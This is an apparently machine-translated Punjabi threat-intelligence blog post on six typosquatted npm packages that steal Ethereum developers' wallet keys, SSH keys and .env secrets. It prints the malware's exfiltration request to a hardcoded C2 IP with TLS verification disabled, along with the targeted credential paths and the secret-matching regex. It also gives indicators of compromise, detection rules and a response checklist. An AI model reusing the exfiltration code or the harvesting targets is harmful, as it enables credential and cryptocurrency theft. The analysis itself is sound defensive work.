ਇਨਕ੍ਰਿਪਸ਼ਨ ਆਪਣੇ ਆਪ ਵਿੱਚ ਮਾਲਵੇਅਰ ਨੂੰ ਵਧੇਰੇ ਉੱਨਤ ਨਹੀਂ ਬਣਾਉਂਦਾ। ਹਾਲਾਂਕਿ, ਇਹ ਨੈੱਟਵਰਕ ਨਿਰੀਖਣ ਨੂੰ ਔਖਾ ਬਣਾਉਂਦਾ ਹੈ। ਬਾਹਰ ਨਿਕਲਣ 'ਤੇ ਨਜ਼ਰ ਰੱਖਣ ਵਾਲਾ ਡਿਫੈਂਡਰ ਇੱਕ JSON ਪੇਲੋਡ ਦੇਖੇਗਾ, ਪਰ ਚੋਰੀ ਹੋਈਆਂ ਚਾਬੀਆਂ, ਵਾਲਿਟ ਫਾਈਲਾਂ, ਜਾਂ .env ਹਾਰਡਕੋਡ ਕੀਤੇ ਪਾਸਫ੍ਰੇਜ਼ ਅਤੇ ਡੀਕ੍ਰਿਪਸ਼ਨ ਤਰਕ ਤੋਂ ਬਿਨਾਂ ਸਮੱਗਰੀ।

ਇੱਕ ਕੱਚੇ IPv4 C2 ਵਿੱਚ ਐਕਸਫਿਲਟਰੇਸ਼ਨ

ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਮਾਰਗ ਹਾਰਡਕੋਡ ਕੀਤਾ ਗਿਆ ਹੈ:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

ਮਾਲਵੇਅਰ ਇਹਨਾਂ ਨੂੰ ਡੇਟਾ ਭੇਜਦਾ ਹੈ:

https://76.13.37.80:8443/api/v1/telemetry

ਦੋ ਵੇਰਵੇ ਵੱਖਰੇ ਹਨ।

ਪਹਿਲਾਂ, C2 ਇੱਕ ਡੋਮੇਨ ਦੀ ਬਜਾਏ ਇੱਕ ਕੱਚਾ IPv4 ਪਤਾ ਹੈ। ਇਹ ਡੋਮੇਨ ਰਜਿਸਟ੍ਰੇਸ਼ਨ ਦੀ ਜ਼ਰੂਰਤ ਨੂੰ ਦੂਰ ਕਰਦਾ ਹੈ ਅਤੇ ਕੁਝ ਡੋਮੇਨ-ਅਧਾਰਿਤ ਖੋਜਾਂ ਤੋਂ ਬਚਦਾ ਹੈ।

ਦੂਜਾ, TLS ਤਸਦੀਕ ਇਸ ਨਾਲ ਅਯੋਗ ਹੈ:

rejectUnauthorized: false

ਇਹ ਮਾਲਵੇਅਰ ਨੂੰ ਕਿਸੇ ਵੀ ਸਰਟੀਫਿਕੇਟ ਨੂੰ ਸਵੀਕਾਰ ਕਰਨ ਦੀ ਆਗਿਆ ਦਿੰਦਾ ਹੈ, ਜਿਸ ਵਿੱਚ ਸਵੈ-ਦਸਤਖਤ ਕੀਤੇ ਸਰਟੀਫਿਕੇਟ ਵੀ ਸ਼ਾਮਲ ਹਨ। ਦੂਜੇ ਸ਼ਬਦਾਂ ਵਿੱਚ, ਹਮਲਾਵਰ ਨੂੰ ਇੱਕ ਵੈਧ ਜਨਤਕ ਸਰਟੀਫਿਕੇਟ ਦੀ ਲੋੜ ਤੋਂ ਬਿਨਾਂ ਏਨਕ੍ਰਿਪਟਡ ਟ੍ਰਾਂਸਪੋਰਟ ਮਿਲਦਾ ਹੈ।

ਕੋਈ ਰੀਟ੍ਰਾਈ ਲਾਜਿਕ ਨਹੀਂ ਹੈ ਅਤੇ ਨਾ ਹੀ ਕੋਈ ਫਾਲਬੈਕ ਹੋਸਟ ਹੈ। ਗਲਤੀਆਂ ਚੁੱਪਚਾਪ ਨਿਗਲ ਜਾਂਦੀਆਂ ਹਨ। ਇਹ ਪੈਕੇਜ ਨੂੰ ਚੁੱਪ ਰੱਖਦਾ ਹੈ ਜੇਕਰ C2 ਔਫਲਾਈਨ ਹੈ ਜਾਂ ਪਹੁੰਚਯੋਗ ਨਹੀਂ ਹੈ।

ਇਹ ਮੁਹਿੰਮ ਕਿਉਂ ਮਾਇਨੇ ਰੱਖਦੀ ਹੈ

ਜ਼ਿਆਦਾਤਰ ਖਤਰਨਾਕ npm ਪੈਕੇਜ ਡਿਵੈਲਪਰਾਂ ਲਈ ਬਣਾਏ ਗਏ ਹਨ ਜੋ ਵਿਆਪਕ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦਾ ਪਿੱਛਾ ਕਰਦੇ ਹਨ: npm ਟੋਕਨ, AWS ਕੁੰਜੀਆਂ, GitHub ਟੋਕਨ, ਜਾਂ .npmrc ਫਾਈਲਾਂ

ਇਹ ਮੁਹਿੰਮ ਟੀਚੇ ਨੂੰ ਸੀਮਤ ਕਰਦੀ ਹੈ।

ਇਹ ਉਹਨਾਂ ਸੰਕੇਤਾਂ ਦੀ ਭਾਲ ਕਰਦਾ ਹੈ ਕਿ ਮਸ਼ੀਨ ਕਿਸੇ ਈਥਰਿਅਮ ਜਾਂ ਸਾਲਿਡਿਟੀ ਡਿਵੈਲਪਰ ਦੀ ਹੈ। ਫਿਰ ਇਹ ਉਸ ਵਾਤਾਵਰਣ ਵਿੱਚ ਮਹੱਤਵਪੂਰਨ ਸੰਪਤੀਆਂ ਨੂੰ ਬਿਲਕੁਲ ਖਿੱਚਦਾ ਹੈ: ਵਾਲਿਟ ਕੀਸਟੋਰ, ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਮੈਮੋਨਿਕਸ, ਡਿਪਲਾਇਰ ਕੁੰਜੀਆਂ, .env ਫਾਈਲਾਂ, ਅਤੇ SSH ਕੁੰਜੀਆਂ।

ਇਹ ਮੁਹਿੰਮ ਨੂੰ Web3 ਟੀਮਾਂ ਲਈ ਇੱਕ ਆਮ npm ਸਟੀਲਰ ਨਾਲੋਂ ਵਧੇਰੇ ਖਤਰਨਾਕ ਬਣਾਉਂਦਾ ਹੈ।

ਇੱਕ ਸਫਲ ਇਨਫੈਕਸ਼ਨ ਇਹਨਾਂ ਦਾ ਖੁਲਾਸਾ ਕਰ ਸਕਦੀ ਹੈ:

  • ਡਿਪਲਾਇਮੈਂਟ ਵਾਲਿਟ
  • ਸਮਾਰਟ ਕੰਟਰੈਕਟ ਐਡਮਿਨ ਕੁੰਜੀਆਂ
  • RPC ਪ੍ਰਦਾਤਾ ਕੁੰਜੀਆਂ
  • ਕਲਾਉਡ ਤੈਨਾਤੀ ਪ੍ਰਮਾਣ ਪੱਤਰ
  • npm ਪ੍ਰਕਾਸ਼ਨ ਟੋਕਨ
  • ਡਿਵੈਲਪਰ ਜਾਂ ਬਿਲਡ ਬੁਨਿਆਦੀ ਢਾਂਚੇ ਤੱਕ SSH ਪਹੁੰਚ
  • ਪ੍ਰੋਜੈਕਟ ਦੇ ਭੇਦ ਸਟੋਰ ਕੀਤੇ ਗਏ ਹਨ .env ਫਾਇਲ
  • ਫਾਊਂਡਰੀ, ਗੇਥ, ਜਾਂ ਬ੍ਰਾਊਨੀ ਲਈ ਵਾਲਿਟ ਕੀਸਟੋਰ

ਪੈਕੇਜ ਦੇ ਨਾਮ ਵੀ ਸਪੱਸ਼ਟ ਸਮਾਜਿਕ ਇੰਜੀਨੀਅਰਿੰਗ ਨੂੰ ਦਰਸਾਉਂਦੇ ਹਨ। ਉਹ ਜਾਣੇ-ਪਛਾਣੇ ਟੂਲ ਨਾਵਾਂ ਰਾਹੀਂ Web3 ਡਿਵੈਲਪਰ ਈਕੋਸਿਸਟਮ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਂਦੇ ਹਨ: viem, hardhat, foundry, evmਹੈ, ਅਤੇ web3.

ਅਦਾਕਾਰ ਨੂੰ ਅਸਲ ਪ੍ਰੋਜੈਕਟਾਂ ਨਾਲ ਸਮਝੌਤਾ ਕਰਨ ਦੀ ਜ਼ਰੂਰਤ ਨਹੀਂ ਹੈ। ਉਹਨਾਂ ਨੂੰ ਸਿਰਫ਼ ਇੱਕ ਡਿਵੈਲਪਰ ਦੀ ਜ਼ਰੂਰਤ ਹੈ ਜੋ ਇੱਕ ਵਾਜਬ ਸਾਥੀ ਪੈਕੇਜ ਵਾਂਗ ਦਿਖਾਈ ਦੇਣ ਵਾਲਾ ਇੰਸਟਾਲ ਕਰੇ।

ਸਮਝੌਤਾ ਅਤੇ ਖੋਜ ਦੇ ਸੰਕੇਤ

ਪੈਕੇਜ ਅਤੇ ਪ੍ਰਕਾਸ਼ਕ
ਫੀਲਡ ਮੁੱਲ
npm ਪ੍ਰਕਾਸ਼ਕ ਵੱਲੋਂ james_010206
ਪ੍ਰਕਾਸ਼ਕ ਈਮੇਲ namikazesarada010206@gmail.com
ਈਮੇਲ ਦੀ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ ਨਹੀਂ
SCM ਪ੍ਰਮਾਣਿਤ ਨਹੀਂ
ਪ੍ਰਤਿਸ਼ਠਾ ਸਕੋਰ 1.0
ਪੈਕੇਜ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
ਵਰਜਨ ਸਾਰੇ 1.0.0
ਸਰੋਤ ਭੰਡਾਰ https://github.com/harunosakura030303-maker/evmchain-config
ਨੁਕਸਾਨਦੇਹ ਹੋਣ ਦੀ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ ਸਾਰੇ ਛੇ ਪੈਕੇਜ
ਨੈੱਟਵਰਕ
ਦੀ ਕਿਸਮ ਮੁੱਲ
C2 ਅੰਤਮ ਬਿੰਦੂ https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
C2 ਪੋਰਟ 8443/tcp
TLS ਵਿਵਹਾਰ ਰੱਦ ਕਰੋ ਅਣਅਧਿਕਾਰਤ: ਗਲਤ
ਪੇਲੋਡ ਸਕੀਮਾ {"v":2,"iv": "ਡੀ": "ਟੀ": }
ਫਾਈਲਾਂ ਅਤੇ ਹੈਸ਼
ਦੀ ਕਿਸਮ ਮੁੱਲ
ਟੈਲੀਮੈਟਰੀ.ਜੇਐਸ SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
ਪੈਕੇਜ ਲੇਆਉਟ ਪੈਕੇਜ.ਜੇਸਨ, ਇੰਡੈਕਸ.ਜੇਐਸ, ਟੈਲੀਮੈਟਰੀ.ਜੇਐਸ
ਫਾਈਲ ਗਿਣਤੀ 3
ਲਗਭਗ ਕੁੱਲ ਆਕਾਰ 3.4 KB

ਐਕਟੀਵੇਸ਼ਨ ਸਿਗਨਲ

ਮਾਲਵੇਅਰ ਇਹਨਾਂ ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲਾਂ ਦੀ ਜਾਂਚ ਕਰਦਾ ਹੈ:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

ਇਹ ਇਹਨਾਂ ਦੀ ਵੀ ਜਾਂਚ ਕਰਦਾ ਹੈ:

~/.foundry/

ਨਿਸ਼ਾਨਾ ਬਣਾਏ ਹੋਸਟ ਪਾਥ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

ਸੰਗ੍ਰਹਿ ਰੇਜੈਕਸ

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

ਖੋਜ ਨੋਟਸ

ਕਈ ਨਿਯਮ ਇਸ ਮੁਹਿੰਮ ਨੂੰ ਪੂਰੇ ਵਿਵਹਾਰਕ ਵਿਸ਼ਲੇਸ਼ਣ ਦੀ ਲੋੜ ਤੋਂ ਬਿਨਾਂ ਫੜਦੇ ਹਨ।

ਪਹਿਲਾਂ, ਛੇ ਖਤਰਨਾਕ ਪੈਕੇਜ ਨਾਵਾਂ ਲਈ ਲਾਕਫਾਈਲਾਂ ਨੂੰ ਸਕੈਨ ਕਰੋ:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ਵਿੱਚ ਕੋਈ ਵੀ ਮੈਚ package-lock.json, yarn.lock, pnpm-lock.yaml, ਜ node_modules ਇਤਿਹਾਸ ਨੂੰ ਇੱਕ ਗੰਭੀਰ ਘਟਨਾ ਵਜੋਂ ਮੰਨਿਆ ਜਾਣਾ ਚਾਹੀਦਾ ਹੈ।

ਦੂਜਾ, ਵਾਲਿਟ ਕੀਸਟੋਰ ਮਾਰਗਾਂ ਨੂੰ ਪੜ੍ਹਨ ਵਾਲੇ Node.js ਪ੍ਰਕਿਰਿਆਵਾਂ ਲਈ ਮਾਨੀਟਰ:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

ਇਹ ਸਹਾਇਕ ਨਿਰਭਰਤਾ ਵਜੋਂ ਆਯਾਤ ਕੀਤੇ ਪੈਕੇਜ ਲਈ ਬਹੁਤ ਘੱਟ ਜਾਇਜ਼ ਵਿਵਹਾਰ ਹੈ। ਇਹ ਖਾਸ ਤੌਰ 'ਤੇ ਸ਼ੱਕੀ ਹੁੰਦਾ ਹੈ ਜਦੋਂ ਆਊਟਬਾਊਂਡ ਨੈੱਟਵਰਕ ਗਤੀਵਿਧੀ ਤੋਂ ਬਾਅਦ ਆਉਂਦਾ ਹੈ।

ਤੀਜਾ, HTTPS ਕਨੈਕਸ਼ਨਾਂ ਨੂੰ ਬਲੌਕ ਜਾਂ ਚੇਤਾਵਨੀ ਦਿਓ:

76.13.37.80:8443

ਖਾਸ ਕਰਕੇ ਜਦੋਂ ਬੇਨਤੀ ਮਾਰਗ ਇਹ ਹੈ:

/api/v1/telemetry

ਚੌਥਾ, npm ਪੈਕੇਜਾਂ ਦੀ ਭਾਲ ਕਰੋ ਜੋ ਇਹਨਾਂ ਗੁਣਾਂ ਨੂੰ ਜੋੜਦੇ ਹਨ:

  • ਨਵਾਂ ਜਾਂ ਘੱਟ ਪ੍ਰਤਿਸ਼ਠਾ ਵਾਲਾ ਪ੍ਰਕਾਸ਼ਕ
  • ਗੈਰ-ਤਸਦੀਕਸ਼ੁਦਾ ਜੀਮੇਲ ਖਾਤਾ
  • Web3-ਨਾਲ ਲੱਗਦੇ ਪੈਕੇਜ ਦਾ ਨਾਮ
  • ਕੋਈ ਅਰਥਪੂਰਨ ਰਿਪੋਜ਼ਟਰੀ ਇਤਿਹਾਸ ਨਹੀਂ
  • ਛੋਟਾ ਪੈਕੇਜ ਲੇਆਉਟ
  • index.js ਜੋ ਇੱਕ ਟੈਲੀਮੈਟਰੀ ਜਾਂ ਸਹਾਇਕ ਫਾਈਲ ਲੋਡ ਕਰਦਾ ਹੈ
  • ਕੋਈ ਰਨਟਾਈਮ ਨਿਰਭਰਤਾ ਨਹੀਂ
  • ਸੰਵੇਦਨਸ਼ੀਲ ਵਾਤਾਵਰਣ-ਪਰਿਵਰਤਨਸ਼ੀਲ ਸੰਗ੍ਰਹਿ
  • ਵਾਲੇਟ ਕੀਸਟੋਰ ਪਹੁੰਚ

ਇਹ ਪੈਟਰਨ ਇੱਕ ਸਿੰਗਲ IOC ਨਾਲੋਂ ਵਧੇਰੇ ਉਪਯੋਗੀ ਹੈ ਕਿਉਂਕਿ ਅਗਲਾ ਪੈਕੇਜ IP ਐਡਰੈੱਸ ਬਦਲ ਸਕਦਾ ਹੈ ਪਰ ਉਹੀ ਟਾਰਗੇਟਿੰਗ ਤਰਕ ਰੱਖ ਸਕਦਾ ਹੈ।

ਸਮਝੌਤਾ ਜਵਾਬ ਚੈੱਕਲਿਸਟ

ਜੇਕਰ ਕਿਸੇ ਡਿਵੈਲਪਰ ਨੇ ਛੇ ਪੈਕੇਜਾਂ ਵਿੱਚੋਂ ਇੱਕ ਦੀ ਵਰਤੋਂ ਕੀਤੀ ਹੈ ਅਤੇ ਉਨ੍ਹਾਂ ਦਾ ਵਾਤਾਵਰਣ ਐਕਟੀਵੇਸ਼ਨ ਗੇਟ ਨਾਲ ਮੇਲ ਖਾਂਦਾ ਹੈ, ਤਾਂ ਵਰਕਸਟੇਸ਼ਨ ਨੂੰ ਸਮਝੌਤਾ ਕੀਤਾ ਹੋਇਆ ਮੰਨੋ।

ਇਸ ਵਿੱਚ ਫਾਊਂਡਰੀ ਸਥਾਪਤ ਮਸ਼ੀਨਾਂ, ਵਾਤਾਵਰਣ ਵਿੱਚ ਅਲਕੀਮੀ ਜਾਂ ਇਨਫੂਰਾ ਕੁੰਜੀਆਂ, ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਮੈਮੋਨਿਕਸ, ਜਾਂ ਡਿਪਲਾਇਰ ਕੁੰਜੀਆਂ ਸ਼ਾਮਲ ਹਨ।

ਸਿਫ਼ਾਰਸ਼ੀ ਜਵਾਬ:

  • ਹੋਸਟ ਨੂੰ ਨੈੱਟਵਰਕ ਤੋਂ ਡਿਸਕਨੈਕਟ ਕਰੋ।
  • ਸੁਰੱਖਿਅਤ ਰੱਖੋ node_modules, ਲਾਕਫਾਈਲਾਂ, ਸ਼ੈੱਲ ਇਤਿਹਾਸ, ਅਤੇ ਫੋਰੈਂਸਿਕ ਲਈ ਸੰਬੰਧਿਤ ਲੌਗ।
  • ਹਰੇਕ SSH ਕੀਪੇਅਰ ਨੂੰ ਹੇਠਾਂ ਘੁੰਮਾਓ ~/.ssh/.
  • ਹਰੇਕ ਕੀਸਟੋਰ ਲਈ ਵਾਲਿਟ ਕੁੰਜੀਆਂ ਨੂੰ ਹੇਠਾਂ ਘੁੰਮਾਓ ~/.foundry, ~/.ethereumਹੈ, ਅਤੇ ~/.brownie.
  • ਫੰਡਾਂ ਨੂੰ ਨਵੇਂ ਬਟੂਏ ਵਿੱਚ ਭੇਜੋ।
  • ਵਿੱਚ ਸਟੋਰ ਕੀਤੇ ਹਰ ਗੁਪਤ ਨੂੰ ਘੁੰਮਾਓ .env* ਡਿਵੈਲਪਰ ਦੁਆਰਾ ਕੰਮ ਕੀਤੇ ਗਏ ਰਿਪੋਜ਼ਟਰੀਆਂ ਵਿੱਚ ਫਾਈਲਾਂ।
  • ਸੰਗ੍ਰਹਿ ਰੇਜੈਕਸ ਨਾਲ ਮੇਲ ਖਾਂਦੇ ਵਾਤਾਵਰਣ ਭੇਦ ਘੁੰਮਾਓ, ਜਿਸ ਵਿੱਚ AWS ਕੁੰਜੀਆਂ, npm ਟੋਕਨ, ਡਿਪਲਾਇ ਟੋਕਨ, API ਕੁੰਜੀਆਂ, ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਬੀਜ, ਅਤੇ ਯਾਦਵ ਸ਼ਾਮਲ ਹਨ।
  • ਪੈਕੇਜ ਪਹਿਲੀ ਵਾਰ ਸਥਾਪਿਤ ਹੋਣ ਤੋਂ ਬਾਅਦ ਆਡਿਟ ਕਲਾਉਡ, npm, GitHub, RPC ਪ੍ਰਦਾਤਾ, ਅਤੇ ਬਲਾਕਚੈਨ ਗਤੀਵਿਧੀ।
  • ਮੁੜ ਵਰਤੋਂ ਤੋਂ ਪਹਿਲਾਂ ਵਰਕਸਟੇਸ਼ਨ ਦੀ ਦੁਬਾਰਾ ਤਸਵੀਰ ਲਓ।

ਡਿਫੈਂਡਰਾਂ ਨੂੰ ਕੀ ਲੈ ਜਾਣਾ ਚਾਹੀਦਾ ਹੈ

ਇਹ ਮੁਹਿੰਮ ਦਰਸਾਉਂਦੀ ਹੈ ਕਿ ਕਿਵੇਂ npm ਟਾਈਪੋਸਕੈਟਿੰਗ ਉੱਚ-ਮੁੱਲ ਵਾਲੇ ਡਿਵੈਲਪਰ ਈਕੋਸਿਸਟਮ ਦੇ ਆਲੇ-ਦੁਆਲੇ ਵਿਕਸਤ ਹੋ ਰਹੀ ਹੈ।

ਅਦਾਕਾਰ ਨੂੰ ਦ੍ਰਿੜਤਾ ਦੀ ਲੋੜ ਨਹੀਂ ਸੀ। ਉਹਨਾਂ ਨੂੰ ਉਲਝਣ ਦੀ ਲੋੜ ਨਹੀਂ ਸੀ। ਉਹਨਾਂ ਨੂੰ ਇੰਸਟਾਲ-ਟਾਈਮ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦੀ ਵੀ ਲੋੜ ਨਹੀਂ ਸੀ।

ਇਸ ਦੀ ਬਜਾਏ, ਉਹ ਤਿੰਨ ਚੀਜ਼ਾਂ 'ਤੇ ਨਿਰਭਰ ਕਰਦੇ ਸਨ:

  • ਮੰਨਣਯੋਗ Web3 ਪੈਕੇਜ ਨਾਮ
  • ਸਿਰਫ਼ ਅਸਲੀ ਕ੍ਰਿਪਟੋ-ਵਿਕਾਸ ਮਸ਼ੀਨਾਂ 'ਤੇ ਸਰਗਰਮੀ
  • ਈਥਰਿਅਮ ਡਿਵੈਲਪਰਾਂ ਲਈ ਸਭ ਤੋਂ ਮਹੱਤਵਪੂਰਨ ਫਾਈਲਾਂ ਅਤੇ ਰਾਜ਼ਾਂ ਦੀ ਸਿੱਧੀ ਚੋਰੀ

ਇਸ ਨਾਲ ਮੁਹਿੰਮ ਨੂੰ ਵਿਆਪਕ ਸਕੈਨਿੰਗ ਵਿੱਚ ਖੁੰਝਣਾ ਆਸਾਨ ਹੋ ਜਾਂਦਾ ਹੈ ਅਤੇ ਜਦੋਂ ਇਹ ਸਹੀ ਵਾਤਾਵਰਣ ਵਿੱਚ ਉਤਰਦੀ ਹੈ ਤਾਂ ਇਹ ਖ਼ਤਰਨਾਕ ਹੋ ਜਾਂਦੀ ਹੈ।

Web3 ਟੀਮਾਂ ਲਈ, ਸਬਕ ਸਪੱਸ਼ਟ ਹੈ: ਨਿਰਭਰਤਾ ਦੇ ਨਾਵਾਂ ਨੂੰ ਆਪਣੇ ਖ਼ਤਰੇ ਦੇ ਮਾਡਲ ਦੇ ਹਿੱਸੇ ਵਜੋਂ ਸਮਝੋ। ਇੱਕ ਪੈਕੇਜ ਜੋ ਇੱਕ ਨੁਕਸਾਨ ਰਹਿਤ ਸਹਾਇਕ ਵਰਗਾ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ, ਅਜੇ ਵੀ ਵਾਲਿਟ ਸਮਝੌਤਾ ਕਰਨ ਦਾ ਸਭ ਤੋਂ ਛੋਟਾ ਰਸਤਾ ਬਣ ਸਕਦਾ ਹੈ।

npm ਰਜਿਸਟਰੀ ਨੂੰ ਰਿਪੋਰਟ ਕੀਤਾ ਗਿਆ। ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ ਅਤੇ ਪੈਕੇਜ ਹਟਾਏ ਜਾਣ 'ਤੇ ਅਸੀਂ ਇਸ ਪੋਸਟ ਨੂੰ ਅਪਡੇਟ ਕਰਾਂਗੇ।

sca-ਟੂਲਜ਼-ਸਾਫਟਵੇਅਰ-ਰਚਨਾ-ਵਿਸ਼ਲੇਸ਼ਣ-ਟੂਲਜ਼
ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਜੋਖਮਾਂ ਨੂੰ ਤਰਜੀਹ ਦਿਓ, ਸੁਧਾਰੋ ਅਤੇ ਸੁਰੱਖਿਅਤ ਕਰੋ
ਆਪਣਾ ਮੁਫ਼ਤ ਖਾਤਾ ਪ੍ਰਾਪਤ ਕਰੋ।
ਕੋਈ ਕ੍ਰੈਡਿਟ ਕਾਰਡ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ

ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਵਿਕਾਸ ਅਤੇ ਡਿਲੀਵਰੀ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰੋ

ਜ਼ਾਇਜੇਨੀ ਪ੍ਰੋਡਕਟ ਸੂਟ ਦੇ ਨਾਲ